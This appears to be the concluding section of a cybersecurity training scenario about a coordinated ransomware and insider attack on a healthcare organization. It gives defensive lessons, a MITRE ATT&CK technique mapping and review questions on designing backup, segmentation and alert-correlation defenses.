M&A integration is a critical attack surface -- Acquired organizations bring security debt into the parent organization. Hastily configured cross-account roles, unaligned security baselines, and incomplete EDR deployment create exploitable gaps. Security integration must be a gating criterion for M&A technical integration.
-
Insider threats multiply the impact of external attacks -- An insider who sabotages backups, creates backdoor accounts, and weakens segmentation transforms a recoverable ransomware event into a catastrophic one. Defense: immutable backup architectures (air-gapped, append-only), separation of duties, behavioral analytics for privileged users, and multi-person authorization for security-critical changes.
-
Medical device security requires zero-trust segmentation -- Devices with limited security capabilities must be treated as untrusted. Segmentation should prevent lateral movement regardless of firewall exceptions. Device behavior baselines should detect unexpected outbound connections.
-
Backup integrity verification must be independent and immutable -- Verification processes must be independent of the systems they verify. Immutable copies (WORM storage, air-gapped tapes, cloud object lock) provide recovery even when backup infrastructure is compromised.
-
Healthcare organizations face unique multi-stakeholder response challenges -- A healthcare breach involves patient safety, clinical continuity, HIPAA notification, FDA device reporting, clinical trial sponsor notification, law enforcement, cyber insurance, and board-level ransom decisions. IR plans must address all stakeholders.
MITRE ATT&CK Mapping¶
| Technique ID | Technique Name | Phase |
|---|---|---|
| T1566.001 | Phishing: Spearphishing Attachment | Initial Access (Vector 1) |
| T1195.002 | Supply Chain: Software Supply Chain | Initial Access (Vector 2) |
| T1078.004 | Valid Accounts: Cloud Accounts | Initial Access (Vector 3) |
| T1098 | Account Manipulation | Persistence (Vector 4 insider) |
| T1136.003 | Create Account: Cloud Account | Persistence (backdoor admin) |
| T1550 | Use Alternate Authentication Material | Lateral Movement (token replay) |
| T1021.004 | Remote Services: SSH | Lateral Movement (device pivot) |
| T1530 | Data from Cloud Storage Object | Collection (S3 and Redshift) |
| T1213 | Data from Information Repositories | Collection (EHR, file shares) |
| T1567.002 | Exfiltration Over Web Service: Cloud Storage | Exfiltration (S3) |
| T1486 | Data Encrypted for Impact | Impact (ransomware) |
| T1490 | Inhibit System Recovery | Impact (backup destruction) |
Review Questions¶
Question 1
This scenario involved four simultaneous attack vectors. For each vector, identify the single most effective preventive control and the single most effective detective control. How do these controls interact and reinforce each other in a defense-in-depth architecture?
Question 2
The insider's sabotage of backup verification transformed a recoverable event into a catastrophe. Design an immutable backup architecture for a healthcare organization that remains recoverable even when a domain admin and a backup admin are both compromised.
Question 3
CHP's SOC had a 12% investigation rate on 2,400 daily alerts. All four vectors generated alerts that were individually dismissed. Design an alert correlation and prioritization system that surfaces coordinated campaigns. Consider: graph-based correlation, temporal clustering, entity-centric grouping, and automated threat intelligence enrichment.
Question 4
The attacker deliberately excluded life-safety medical devices from ransomware to avoid aggressive law enforcement response. How does this restraint complicate incident response? Does the absence of immediate patient harm change response urgency, ransom calculus, or regulatory notification timelines?
Related Resources¶
- Chapter 20: Cloud Attack and Defense
- Chapter 5: Detection Engineering at Scale
- Chapter 49: Threat Intelligence Operations
- Chapter 26: Insider Threats
- Chapter 35: DevSecOps Pipeline
- Chapter 44: Web Application Pentesting
- Chapter 51: Kubernetes Security
- Chapter 50: Adversarial AI and LLM Security
- Chapter 39: Zero Trust Implementation
- Chapter 15: Resilience, Tabletops, and Learning
- SC-097: API Gateway Compromise
- SC-098: Zero Trust Architecture Bypass
- SC-099: AI Model Exfiltration
- SC-091: Container Image Trojan
- SC-093: Cloud Lateral Movement